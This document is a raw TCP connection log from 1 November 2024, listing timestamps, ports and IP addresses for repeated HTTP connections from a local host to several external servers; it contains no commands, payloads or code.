Nov 1, 2024 03:46:20.178996086 CET	49990	80	192.168.2.5	162.0.215.244
Nov 1, 2024 03:46:20.179008961 CET	80	49990	162.0.215.244	192.168.2.5
Nov 1, 2024 03:46:20.179085016 CET	80	49990	162.0.215.244	192.168.2.5
Nov 1, 2024 03:46:20.179126024 CET	49990	80	192.168.2.5	162.0.215.244
Nov 1, 2024 03:46:20.217058897 CET	80	49990	162.0.215.244	192.168.2.5
Nov 1, 2024 03:46:20.217128992 CET	49990	80	192.168.2.5	162.0.215.244
Nov 1, 2024 03:46:20.996896982 CET	49990	80	192.168.2.5	162.0.215.244
Nov 1, 2024 03:46:22.015512943 CET	49991	80	192.168.2.5	162.0.215.244
Nov 1, 2024 03:46:22.021660089 CET	80	49991	162.0.215.244	192.168.2.5
Nov 1, 2024 03:46:22.021789074 CET	49991	80	192.168.2.5	162.0.215.244
Nov 1, 2024 03:46:22.040221930 CET	49991	80	192.168.2.5	162.0.215.244
Nov 1, 2024 03:46:22.046281099 CET	80	49991	162.0.215.244	192.168.2.5
Nov 1, 2024 03:46:22.713128090 CET	80	49991	162.0.215.244	192.168.2.5
Nov 1, 2024 03:46:22.713205099 CET	80	49991	162.0.215.244	192.168.2.5
Nov 1, 2024 03:46:22.713216066 CET	80	49991	162.0.215.244	192.168.2.5
Nov 1, 2024 03:46:22.713311911 CET	49991	80	192.168.2.5	162.0.215.244
Nov 1, 2024 03:46:22.713428020 CET	80	49991	162.0.215.244	192.168.2.5
Nov 1, 2024 03:46:22.713440895 CET	80	49991	162.0.215.244	192.168.2.5
Nov 1, 2024 03:46:22.713536024 CET	49991	80	192.168.2.5	162.0.215.244
Nov 1, 2024 03:46:22.751734972 CET	80	49991	162.0.215.244	192.168.2.5
Nov 1, 2024 03:46:22.751843929 CET	49991	80	192.168.2.5	162.0.215.244
Nov 1, 2024 03:46:23.543349028 CET	49991	80	192.168.2.5	162.0.215.244
Nov 1, 2024 03:46:24.561820030 CET	49992	80	192.168.2.5	162.0.215.244
Nov 1, 2024 03:46:24.566603899 CET	80	49992	162.0.215.244	192.168.2.5
Nov 1, 2024 03:46:24.566684961 CET	49992	80	192.168.2.5	162.0.215.244
Nov 1, 2024 03:46:24.577418089 CET	49992	80	192.168.2.5	162.0.215.244
Nov 1, 2024 03:46:24.582233906 CET	80	49992	162.0.215.244	192.168.2.5
Nov 1, 2024 03:46:24.582245111 CET	80	49992	162.0.215.244	192.168.2.5
Nov 1, 2024 03:46:25.247807980 CET	80	49992	162.0.215.244	192.168.2.5
Nov 1, 2024 03:46:25.247859955 CET	80	49992	162.0.215.244	192.168.2.5
Nov 1, 2024 03:46:25.247874975 CET	80	49992	162.0.215.244	192.168.2.5
Nov 1, 2024 03:46:25.247896910 CET	49992	80	192.168.2.5	162.0.215.244
Nov 1, 2024 03:46:25.247946978 CET	80	49992	162.0.215.244	192.168.2.5
Nov 1, 2024 03:46:25.247981071 CET	49992	80	192.168.2.5	162.0.215.244
Nov 1, 2024 03:46:25.248019934 CET	80	49992	162.0.215.244	192.168.2.5
Nov 1, 2024 03:46:25.285959959 CET	80	49992	162.0.215.244	192.168.2.5
Nov 1, 2024 03:46:25.286036015 CET	49992	80	192.168.2.5	162.0.215.244
Nov 1, 2024 03:46:26.090260983 CET	49992	80	192.168.2.5	162.0.215.244
Nov 1, 2024 03:46:27.109025955 CET	49993	80	192.168.2.5	162.0.215.244
Nov 1, 2024 03:46:27.114023924 CET	80	49993	162.0.215.244	192.168.2.5
Nov 1, 2024 03:46:27.114130020 CET	49993	80	192.168.2.5	162.0.215.244
Nov 1, 2024 03:46:27.121200085 CET	49993	80	192.168.2.5	162.0.215.244
Nov 1, 2024 03:46:27.126452923 CET	80	49993	162.0.215.244	192.168.2.5
Nov 1, 2024 03:46:27.801388979 CET	80	49993	162.0.215.244	192.168.2.5
Nov 1, 2024 03:46:27.801420927 CET	80	49993	162.0.215.244	192.168.2.5
Nov 1, 2024 03:46:27.801434040 CET	80	49993	162.0.215.244	192.168.2.5
Nov 1, 2024 03:46:27.801523924 CET	49993	80	192.168.2.5	162.0.215.244
Nov 1, 2024 03:46:27.801558971 CET	80	49993	162.0.215.244	192.168.2.5
Nov 1, 2024 03:46:27.801578045 CET	80	49993	162.0.215.244	192.168.2.5
Nov 1, 2024 03:46:27.801592112 CET	80	49993	162.0.215.244	192.168.2.5
Nov 1, 2024 03:46:27.801611900 CET	49993	80	192.168.2.5	162.0.215.244
Nov 1, 2024 03:46:27.801737070 CET	49993	80	192.168.2.5	162.0.215.244
Nov 1, 2024 03:46:27.801862955 CET	80	49993	162.0.215.244	192.168.2.5
Nov 1, 2024 03:46:27.801875114 CET	80	49993	162.0.215.244	192.168.2.5
Nov 1, 2024 03:46:27.801884890 CET	80	49993	162.0.215.244	192.168.2.5
Nov 1, 2024 03:46:27.801912069 CET	49993	80	192.168.2.5	162.0.215.244
Nov 1, 2024 03:46:27.839520931 CET	80	49993	162.0.215.244	192.168.2.5
Nov 1, 2024 03:46:27.839677095 CET	49993	80	192.168.2.5	162.0.215.244
Nov 1, 2024 03:46:27.840600014 CET	49993	80	192.168.2.5	162.0.215.244
Nov 1, 2024 03:46:27.850451946 CET	80	49993	162.0.215.244	192.168.2.5
Nov 1, 2024 03:46:32.876087904 CET	49994	80	192.168.2.5	162.0.231.203
Nov 1, 2024 03:46:32.880902052 CET	80	49994	162.0.231.203	192.168.2.5
Nov 1, 2024 03:46:32.884372950 CET	49994	80	192.168.2.5	162.0.231.203
Nov 1, 2024 03:46:32.896075010 CET	49994	80	192.168.2.5	162.0.231.203
Nov 1, 2024 03:46:32.900882006 CET	80	49994	162.0.231.203	192.168.2.5
Nov 1, 2024 03:46:33.607049942 CET	80	49994	162.0.231.203	192.168.2.5
Nov 1, 2024 03:46:33.645211935 CET	80	49994	162.0.231.203	192.168.2.5
Nov 1, 2024 03:46:33.645276070 CET	49994	80	192.168.2.5	162.0.231.203
Nov 1, 2024 03:46:34.402997017 CET	49994	80	192.168.2.5	162.0.231.203
Nov 1, 2024 03:46:35.421670914 CET	49995	80	192.168.2.5	162.0.231.203
Nov 1, 2024 03:46:35.426553965 CET	80	49995	162.0.231.203	192.168.2.5
Nov 1, 2024 03:46:35.426623106 CET	49995	80	192.168.2.5	162.0.231.203
Nov 1, 2024 03:46:35.441714048 CET	49995	80	192.168.2.5	162.0.231.203
Nov 1, 2024 03:46:35.446491957 CET	80	49995	162.0.231.203	192.168.2.5
Nov 1, 2024 03:46:36.153080940 CET	80	49995	162.0.231.203	192.168.2.5
Nov 1, 2024 03:46:36.183125973 CET	80	49995	162.0.231.203	192.168.2.5
Nov 1, 2024 03:46:36.183248043 CET	49995	80	192.168.2.5	162.0.231.203
Nov 1, 2024 03:46:36.949580908 CET	49995	80	192.168.2.5	162.0.231.203
Nov 1, 2024 03:46:37.968786955 CET	49996	80	192.168.2.5	162.0.231.203
Nov 1, 2024 03:46:37.974608898 CET	80	49996	162.0.231.203	192.168.2.5
Nov 1, 2024 03:46:37.974715948 CET	49996	80	192.168.2.5	162.0.231.203
Nov 1, 2024 03:46:37.988571882 CET	49996	80	192.168.2.5	162.0.231.203
Nov 1, 2024 03:46:37.993356943 CET	80	49996	162.0.231.203	192.168.2.5
Nov 1, 2024 03:46:37.994191885 CET	80	49996	162.0.231.203	192.168.2.5
Nov 1, 2024 03:46:38.653585911 CET	80	49996	162.0.231.203	192.168.2.5
Nov 1, 2024 03:46:38.693377018 CET	80	49996	162.0.231.203	192.168.2.5
Nov 1, 2024 03:46:38.696336985 CET	49996	80	192.168.2.5	162.0.231.203
Nov 1, 2024 03:46:39.496491909 CET	49996	80	192.168.2.5	162.0.231.203
Nov 1, 2024 03:46:40.516112089 CET	49997	80	192.168.2.5	162.0.231.203
Nov 1, 2024 03:46:40.520962954 CET	80	49997	162.0.231.203	192.168.2.5
Nov 1, 2024 03:46:40.528073072 CET	49997	80	192.168.2.5	162.0.231.203
Nov 1, 2024 03:46:40.532124996 CET	49997	80	192.168.2.5	162.0.231.203
Nov 1, 2024 03:46:40.537019968 CET	80	49997	162.0.231.203	192.168.2.5
Nov 1, 2024 03:46:41.218123913 CET	80	49997	162.0.231.203	192.168.2.5
Nov 1, 2024 03:46:41.256088018 CET	80	49997	162.0.231.203	192.168.2.5
Nov 1, 2024 03:46:41.260365963 CET	49997	80	192.168.2.5	162.0.231.203
Nov 1, 2024 03:46:41.264101028 CET	49997	80	192.168.2.5	162.0.231.203
Nov 1, 2024 03:46:41.268986940 CET	80	49997	162.0.231.203	192.168.2.5
Nov 1, 2024 03:46:46.278228045 CET	49998	80	192.168.2.5	103.71.154.12
Nov 1, 2024 03:46:46.283107042 CET	80	49998	103.71.154.12	192.168.2.5
Nov 1, 2024 03:46:46.283200026 CET	49998	80	192.168.2.5	103.71.154.12
Nov 1, 2024 03:46:46.293983936 CET	49998	80	192.168.2.5	103.71.154.12
Nov 1, 2024 03:46:46.298791885 CET	80	49998	103.71.154.12	192.168.2.5
Nov 1, 2024 03:46:47.246354103 CET	80	49998	103.71.154.12	192.168.2.5
Nov 1, 2024 03:46:47.294066906 CET	49998	80	192.168.2.5	103.71.154.12
Nov 1, 2024 03:46:47.420624971 CET	80	49998	103.71.154.12	192.168.2.5
Nov 1, 2024 03:46:47.420733929 CET	49998	80	192.168.2.5	103.71.154.12
Nov 1, 2024 03:46:47.809506893 CET	49998	80	192.168.2.5	103.71.154.12
Nov 1, 2024 03:46:48.827687025 CET	49999	80	192.168.2.5	103.71.154.12
Nov 1, 2024 03:46:49.361968994 CET	80	49999	103.71.154.12	192.168.2.5
Nov 1, 2024 03:46:49.366173983 CET	49999	80	192.168.2.5	103.71.154.12
Nov 1, 2024 03:46:49.378072977 CET	49999	80	192.168.2.5	103.71.154.12
Nov 1, 2024 03:46:49.383045912 CET	80	49999	103.71.154.12	192.168.2.5
Nov 1, 2024 03:46:50.323093891 CET	80	49999	103.71.154.12	192.168.2.5
Nov 1, 2024 03:46:50.375711918 CET	49999	80	192.168.2.5	103.71.154.12
Nov 1, 2024 03:46:50.498881102 CET	80	49999	103.71.154.12	192.168.2.5
Nov 1, 2024 03:46:50.500154972 CET	49999	80	192.168.2.5	103.71.154.12
Nov 1, 2024 03:46:50.887123108 CET	49999	80	192.168.2.5	103.71.154.12
Nov 1, 2024 03:46:51.906776905 CET	50000	80	192.168.2.5	103.71.154.12
Nov 1, 2024 03:46:51.911650896 CET	80	50000	103.71.154.12	192.168.2.5
Nov 1, 2024 03:46:51.911722898 CET	50000	80	192.168.2.5	103.71.154.12
Nov 1, 2024 03:46:51.924612999 CET	50000	80	192.168.2.5	103.71.154.12
Nov 1, 2024 03:46:51.929733038 CET	80	50000	103.71.154.12	192.168.2.5
Nov 1, 2024 03:46:51.929749966 CET	80	50000	103.71.154.12	192.168.2.5
Nov 1, 2024 03:46:52.861023903 CET	80	50000	103.71.154.12	192.168.2.5
Nov 1, 2024 03:46:52.904179096 CET	50000	80	192.168.2.5	103.71.154.12
Nov 1, 2024 03:46:53.043634892 CET	80	50000	103.71.154.12	192.168.2.5
Nov 1, 2024 03:46:53.043787956 CET	50000	80	192.168.2.5	103.71.154.12
Nov 1, 2024 03:46:53.433998108 CET	50000	80	192.168.2.5	103.71.154.12
Nov 1, 2024 03:46:54.454744101 CET	50001	80	192.168.2.5	103.71.154.12
Nov 1, 2024 03:46:54.459594011 CET	80	50001	103.71.154.12	192.168.2.5
Nov 1, 2024 03:46:54.460175037 CET	50001	80	192.168.2.5	103.71.154.12
Nov 1, 2024 03:46:54.473989964 CET	50001	80	192.168.2.5	103.71.154.12
Nov 1, 2024 03:46:54.478821039 CET	80	50001	103.71.154.12	192.168.2.5
Nov 1, 2024 03:46:55.421771049 CET	80	50001	103.71.154.12	192.168.2.5
Nov 1, 2024 03:46:55.480772972 CET	50001	80	192.168.2.5	103.71.154.12
Nov 1, 2024 03:46:55.600455046 CET	80	50001	103.71.154.12	192.168.2.5
Nov 1, 2024 03:46:55.600581884 CET	50001	80	192.168.2.5	103.71.154.12
Nov 1, 2024 03:46:55.601511002 CET	50001	80	192.168.2.5	103.71.154.12
Nov 1, 2024 03:46:55.606339931 CET	80	50001	103.71.154.12	192.168.2.5
Nov 1, 2024 03:47:00.656620026 CET	50002	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:47:00.661695957 CET	80	50002	3.33.130.190	192.168.2.5
Nov 1, 2024 03:47:00.661890030 CET	50002	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:47:00.678478956 CET	50002	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:47:00.683502913 CET	80	50002	3.33.130.190	192.168.2.5
Nov 1, 2024 03:47:01.296895981 CET	80	50002	3.33.130.190	192.168.2.5
Nov 1, 2024 03:47:01.298156977 CET	50002	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:47:02.184026003 CET	50002	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:47:02.188870907 CET	80	50002	3.33.130.190	192.168.2.5
Nov 1, 2024 03:47:03.202617884 CET	50003	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:47:03.207559109 CET	80	50003	3.33.130.190	192.168.2.5
Nov 1, 2024 03:47:03.207669020 CET	50003	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:47:03.221880913 CET	50003	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:47:03.226802111 CET	80	50003	3.33.130.190	192.168.2.5
Nov 1, 2024 03:47:03.840188026 CET	80	50003	3.33.130.190	192.168.2.5
Nov 1, 2024 03:47:03.840243101 CET	50003	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:47:04.730815887 CET	50003	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:47:04.735738039 CET	80	50003	3.33.130.190	192.168.2.5
Nov 1, 2024 03:47:05.750885963 CET	50004	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:47:05.755721092 CET	80	50004	3.33.130.190	192.168.2.5
Nov 1, 2024 03:47:05.755791903 CET	50004	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:47:05.768837929 CET	50004	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:47:05.775262117 CET	80	50004	3.33.130.190	192.168.2.5
Nov 1, 2024 03:47:05.775275946 CET	80	50004	3.33.130.190	192.168.2.5
Nov 1, 2024 03:47:06.374381065 CET	80	50004	3.33.130.190	192.168.2.5
Nov 1, 2024 03:47:06.374480009 CET	50004	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:47:07.277745008 CET	50004	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:47:07.282573938 CET	80	50004	3.33.130.190	192.168.2.5
Nov 1, 2024 03:47:08.297178030 CET	50005	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:47:08.301950932 CET	80	50005	3.33.130.190	192.168.2.5
Nov 1, 2024 03:47:08.302026033 CET	50005	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:47:08.310547113 CET	50005	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:47:08.315310001 CET	80	50005	3.33.130.190	192.168.2.5
Nov 1, 2024 03:47:08.939538002 CET	80	50005	3.33.130.190	192.168.2.5
Nov 1, 2024 03:47:08.941063881 CET	80	50005	3.33.130.190	192.168.2.5
Nov 1, 2024 03:47:08.941143036 CET	50005	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:47:08.942306042 CET	50005	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:47:08.947230101 CET	80	50005	3.33.130.190	192.168.2.5
Nov 1, 2024 03:47:13.967041016 CET	50006	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:47:13.971889019 CET	80	50006	3.33.130.190	192.168.2.5
Nov 1, 2024 03:47:13.971956015 CET	50006	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:47:13.986392975 CET	50006	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:47:13.991152048 CET	80	50006	3.33.130.190	192.168.2.5
Nov 1, 2024 03:47:15.496532917 CET	50006	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:47:15.501786947 CET	80	50006	3.33.130.190	192.168.2.5
Nov 1, 2024 03:47:15.501943111 CET	50006	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:47:16.518171072 CET	50007	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:47:16.522988081 CET	80	50007	3.33.130.190	192.168.2.5
Nov 1, 2024 03:47:16.526174068 CET	50007	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:47:16.538089991 CET	50007	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:47:16.542861938 CET	80	50007	3.33.130.190	192.168.2.5
Nov 1, 2024 03:47:17.161381006 CET	80	50007	3.33.130.190	192.168.2.5
Nov 1, 2024 03:47:17.162260056 CET	50007	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:47:18.043420076 CET	50007	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:47:18.049614906 CET	80	50007	3.33.130.190	192.168.2.5
Nov 1, 2024 03:47:19.062139988 CET	50008	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:47:19.067045927 CET	80	50008	3.33.130.190	192.168.2.5
Nov 1, 2024 03:47:19.070133924 CET	50008	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:47:19.082088947 CET	50008	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:47:19.086927891 CET	80	50008	3.33.130.190	192.168.2.5
Nov 1, 2024 03:47:19.087038040 CET	80	50008	3.33.130.190	192.168.2.5
Nov 1, 2024 03:47:19.688821077 CET	80	50008	3.33.130.190	192.168.2.5
Nov 1, 2024 03:47:19.688882113 CET	50008	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:47:20.594115019 CET	50008	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:47:20.598926067 CET	80	50008	3.33.130.190	192.168.2.5
Nov 1, 2024 03:47:21.609570026 CET	50009	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:47:21.794589043 CET	80	50009	3.33.130.190	192.168.2.5
Nov 1, 2024 03:47:21.794720888 CET	50009	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:47:21.803534031 CET	50009	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:47:21.809412956 CET	80	50009	3.33.130.190	192.168.2.5
Nov 1, 2024 03:47:22.456135988 CET	80	50009	3.33.130.190	192.168.2.5
Nov 1, 2024 03:47:22.457077980 CET	80	50009	3.33.130.190	192.168.2.5
Nov 1, 2024 03:47:22.457127094 CET	50009	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:47:22.476372957 CET	50009	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:47:22.481117010 CET	80	50009	3.33.130.190	192.168.2.5
Nov 1, 2024 03:47:27.558271885 CET	50010	80	192.168.2.5	199.59.243.227
Nov 1, 2024 03:47:27.563369036 CET	80	50010	199.59.243.227	192.168.2.5
Nov 1, 2024 03:47:27.563440084 CET	50010	80	192.168.2.5	199.59.243.227
Nov 1, 2024 03:47:27.576492071 CET	50010	80	192.168.2.5	199.59.243.227
Nov 1, 2024 03:47:27.581257105 CET	80	50010	199.59.243.227	192.168.2.5
Nov 1, 2024 03:47:28.198755026 CET	80	50010	199.59.243.227	192.168.2.5
Nov 1, 2024 03:47:28.198919058 CET	80	50010	199.59.243.227	192.168.2.5
Nov 1, 2024 03:47:28.199079990 CET	50010	80	192.168.2.5	199.59.243.227
Nov 1, 2024 03:47:28.199168921 CET	80	50010	199.59.243.227	192.168.2.5
Nov 1, 2024 03:47:28.199212074 CET	50010	80	192.168.2.5	199.59.243.227
Nov 1, 2024 03:47:29.090284109 CET	50010	80	192.168.2.5	199.59.243.227
Nov 1, 2024 03:47:30.109775066 CET	50011	80	192.168.2.5	199.59.243.227
Nov 1, 2024 03:47:30.114934921 CET	80	50011	199.59.243.227	192.168.2.5
Nov 1, 2024 03:47:30.115014076 CET	50011	80	192.168.2.5	199.59.243.227
Nov 1, 2024 03:47:30.128534079 CET	50011	80	192.168.2.5	199.59.243.227
Nov 1, 2024 03:47:30.133557081 CET	80	50011	199.59.243.227	192.168.2.5
Nov 1, 2024 03:47:30.743176937 CET	80	50011	199.59.243.227	192.168.2.5
Nov 1, 2024 03:47:30.743216991 CET	80	50011	199.59.243.227	192.168.2.5
Nov 1, 2024 03:47:30.743273973 CET	80	50011	199.59.243.227	192.168.2.5
Nov 1, 2024 03:47:30.746587992 CET	50011	80	192.168.2.5	199.59.243.227
Nov 1, 2024 03:47:31.637089014 CET	50011	80	192.168.2.5	199.59.243.227
Nov 1, 2024 03:47:32.658102036 CET	50012	80	192.168.2.5	199.59.243.227
Nov 1, 2024 03:47:32.663002014 CET	80	50012	199.59.243.227	192.168.2.5
Nov 1, 2024 03:47:32.669895887 CET	50012	80	192.168.2.5	199.59.243.227
Nov 1, 2024 03:47:32.678112984 CET	50012	80	192.168.2.5	199.59.243.227
Nov 1, 2024 03:47:32.682934046 CET	80	50012	199.59.243.227	192.168.2.5
Nov 1, 2024 03:47:32.683043003 CET	80	50012	199.59.243.227	192.168.2.5
Nov 1, 2024 03:47:33.311518908 CET	80	50012	199.59.243.227	192.168.2.5
Nov 1, 2024 03:47:33.312419891 CET	80	50012	199.59.243.227	192.168.2.5
Nov 1, 2024 03:47:33.312447071 CET	80	50012	199.59.243.227	192.168.2.5
Nov 1, 2024 03:47:33.312596083 CET	50012	80	192.168.2.5	199.59.243.227
Nov 1, 2024 03:47:34.187278986 CET	50012	80	192.168.2.5	199.59.243.227
Nov 1, 2024 03:47:35.204165936 CET	50013	80	192.168.2.5	199.59.243.227
Nov 1, 2024 03:47:35.208996058 CET	80	50013	199.59.243.227	192.168.2.5
Nov 1, 2024 03:47:35.209155083 CET	50013	80	192.168.2.5	199.59.243.227
Nov 1, 2024 03:47:35.216301918 CET	50013	80	192.168.2.5	199.59.243.227
Nov 1, 2024 03:47:35.221067905 CET	80	50013	199.59.243.227	192.168.2.5
Nov 1, 2024 03:47:35.824925900 CET	80	50013	199.59.243.227	192.168.2.5
Nov 1, 2024 03:47:35.824947119 CET	80	50013	199.59.243.227	192.168.2.5
Nov 1, 2024 03:47:35.825066090 CET	50013	80	192.168.2.5	199.59.243.227
Nov 1, 2024 03:47:35.825433016 CET	80	50013	199.59.243.227	192.168.2.5
Nov 1, 2024 03:47:35.825481892 CET	50013	80	192.168.2.5	199.59.243.227
Nov 1, 2024 03:47:35.829226971 CET	50013	80	192.168.2.5	199.59.243.227
Nov 1, 2024 03:47:35.834028959 CET	80	50013	199.59.243.227	192.168.2.5
Nov 1, 2024 03:47:40.862339020 CET	50014	80	192.168.2.5	13.248.169.48
Nov 1, 2024 03:47:40.867104053 CET	80	50014	13.248.169.48	192.168.2.5
Nov 1, 2024 03:47:40.870213032 CET	50014	80	192.168.2.5	13.248.169.48
Nov 1, 2024 03:47:40.881968021 CET	50014	80	192.168.2.5	13.248.169.48
Nov 1, 2024 03:47:40.886723995 CET	80	50014	13.248.169.48	192.168.2.5
Nov 1, 2024 03:47:41.591562033 CET	80	50014	13.248.169.48	192.168.2.5
Nov 1, 2024 03:47:41.591618061 CET	50014	80	192.168.2.5	13.248.169.48
Nov 1, 2024 03:47:42.387475967 CET	50014	80	192.168.2.5	13.248.169.48
Nov 1, 2024 03:47:42.392292023 CET	80	50014	13.248.169.48	192.168.2.5
Nov 1, 2024 03:47:43.408190012 CET	50015	80	192.168.2.5	13.248.169.48
Nov 1, 2024 03:47:43.413140059 CET	80	50015	13.248.169.48	192.168.2.5
Nov 1, 2024 03:47:43.417371988 CET	50015	80	192.168.2.5	13.248.169.48
Nov 1, 2024 03:47:43.428323984 CET	50015	80	192.168.2.5	13.248.169.48
Nov 1, 2024 03:47:43.433162928 CET	80	50015	13.248.169.48	192.168.2.5
Nov 1, 2024 03:47:44.099319935 CET	80	50015	13.248.169.48	192.168.2.5
Nov 1, 2024 03:47:44.099404097 CET	50015	80	192.168.2.5	13.248.169.48
Nov 1, 2024 03:47:44.934287071 CET	50015	80	192.168.2.5	13.248.169.48
Nov 1, 2024 03:47:44.942786932 CET	80	50015	13.248.169.48	192.168.2.5
Nov 1, 2024 03:47:45.953978062 CET	50016	80	192.168.2.5	13.248.169.48
Nov 1, 2024 03:47:45.958818913 CET	80	50016	13.248.169.48	192.168.2.5
Nov 1, 2024 03:47:45.958924055 CET	50016	80	192.168.2.5	13.248.169.48
Nov 1, 2024 03:47:45.971652031 CET	50016	80	192.168.2.5	13.248.169.48
Nov 1, 2024 03:47:45.977037907 CET	80	50016	13.248.169.48	192.168.2.5
Nov 1, 2024 03:47:45.977047920 CET	80	50016	13.248.169.48	192.168.2.5
Nov 1, 2024 03:47:46.616281033 CET	80	50016	13.248.169.48	192.168.2.5
Nov 1, 2024 03:47:46.622149944 CET	50016	80	192.168.2.5	13.248.169.48
Nov 1, 2024 03:47:47.480967045 CET	50016	80	192.168.2.5	13.248.169.48
Nov 1, 2024 03:47:47.487377882 CET	80	50016	13.248.169.48	192.168.2.5
Nov 1, 2024 03:47:48.500003099 CET	50017	80	192.168.2.5	13.248.169.48
Nov 1, 2024 03:47:48.504789114 CET	80	50017	13.248.169.48	192.168.2.5
Nov 1, 2024 03:47:48.504858971 CET	50017	80	192.168.2.5	13.248.169.48
Nov 1, 2024 03:47:48.513197899 CET	50017	80	192.168.2.5	13.248.169.48
Nov 1, 2024 03:47:48.518198967 CET	80	50017	13.248.169.48	192.168.2.5
Nov 1, 2024 03:47:49.173181057 CET	80	50017	13.248.169.48	192.168.2.5
Nov 1, 2024 03:47:49.205321074 CET	80	50017	13.248.169.48	192.168.2.5
Nov 1, 2024 03:47:49.208347082 CET	50017	80	192.168.2.5	13.248.169.48
Nov 1, 2024 03:47:49.212356091 CET	50017	80	192.168.2.5	13.248.169.48
Nov 1, 2024 03:47:49.217111111 CET	80	50017	13.248.169.48	192.168.2.5
Nov 1, 2024 03:47:54.836544037 CET	50018	80	192.168.2.5	38.88.82.56
Nov 1, 2024 03:47:54.842545033 CET	80	50018	38.88.82.56	192.168.2.5
Nov 1, 2024 03:47:54.844609022 CET	50018	80	192.168.2.5	38.88.82.56
Nov 1, 2024 03:47:54.856195927 CET	50018	80	192.168.2.5	38.88.82.56
Nov 1, 2024 03:47:54.867537022 CET	80	50018	38.88.82.56	192.168.2.5
Nov 1, 2024 03:47:55.556006908 CET	80	50018	38.88.82.56	192.168.2.5
Nov 1, 2024 03:47:55.556021929 CET	80	50018	38.88.82.56	192.168.2.5
Nov 1, 2024 03:47:55.556277990 CET	50018	80	192.168.2.5	38.88.82.56
Nov 1, 2024 03:47:55.608107090 CET	80	50018	38.88.82.56	192.168.2.5
Nov 1, 2024 03:47:55.608184099 CET	50018	80	192.168.2.5	38.88.82.56
Nov 1, 2024 03:47:56.355881929 CET	50018	80	192.168.2.5	38.88.82.56
Nov 1, 2024 03:47:57.374829054 CET	50019	80	192.168.2.5	38.88.82.56
Nov 1, 2024 03:47:57.379790068 CET	80	50019	38.88.82.56	192.168.2.5
Nov 1, 2024 03:47:57.379914999 CET	50019	80	192.168.2.5	38.88.82.56
Nov 1, 2024 03:47:57.390554905 CET	50019	80	192.168.2.5	38.88.82.56
Nov 1, 2024 03:47:57.395410061 CET	80	50019	38.88.82.56	192.168.2.5
Nov 1, 2024 03:47:58.080775976 CET	80	50019	38.88.82.56	192.168.2.5
Nov 1, 2024 03:47:58.080795050 CET	80	50019	38.88.82.56	192.168.2.5
Nov 1, 2024 03:47:58.080888033 CET	50019	80	192.168.2.5	38.88.82.56
Nov 1, 2024 03:47:58.131625891 CET	80	50019	38.88.82.56	192.168.2.5
Nov 1, 2024 03:47:58.131681919 CET	50019	80	192.168.2.5	38.88.82.56
Nov 1, 2024 03:47:58.903448105 CET	50019	80	192.168.2.5	38.88.82.56
Nov 1, 2024 03:47:59.944693089 CET	50020	80	192.168.2.5	38.88.82.56
Nov 1, 2024 03:47:59.950509071 CET	80	50020	38.88.82.56	192.168.2.5
Nov 1, 2024 03:47:59.950582027 CET	50020	80	192.168.2.5	38.88.82.56
Nov 1, 2024 03:47:59.963891029 CET	50020	80	192.168.2.5	38.88.82.56
Nov 1, 2024 03:47:59.968965054 CET	80	50020	38.88.82.56	192.168.2.5
Nov 1, 2024 03:47:59.968980074 CET	80	50020	38.88.82.56	192.168.2.5
Nov 1, 2024 03:48:00.652173996 CET	80	50020	38.88.82.56	192.168.2.5
Nov 1, 2024 03:48:00.652193069 CET	80	50020	38.88.82.56	192.168.2.5
Nov 1, 2024 03:48:00.652282000 CET	50020	80	192.168.2.5	38.88.82.56
Nov 1, 2024 03:48:00.703599930 CET	80	50020	38.88.82.56	192.168.2.5
Nov 1, 2024 03:48:00.703741074 CET	50020	80	192.168.2.5	38.88.82.56
Nov 1, 2024 03:48:01.466150045 CET	50020	80	192.168.2.5	38.88.82.56
Nov 1, 2024 03:48:02.484255075 CET	50021	80	192.168.2.5	38.88.82.56
Nov 1, 2024 03:48:02.489168882 CET	80	50021	38.88.82.56	192.168.2.5
Nov 1, 2024 03:48:02.489278078 CET	50021	80	192.168.2.5	38.88.82.56
Nov 1, 2024 03:48:02.496306896 CET	50021	80	192.168.2.5	38.88.82.56
Nov 1, 2024 03:48:02.501177073 CET	80	50021	38.88.82.56	192.168.2.5
Nov 1, 2024 03:48:03.203526974 CET	80	50021	38.88.82.56	192.168.2.5
Nov 1, 2024 03:48:03.203552008 CET	80	50021	38.88.82.56	192.168.2.5
Nov 1, 2024 03:48:03.206943035 CET	50021	80	192.168.2.5	38.88.82.56
Nov 1, 2024 03:48:03.255196095 CET	80	50021	38.88.82.56	192.168.2.5
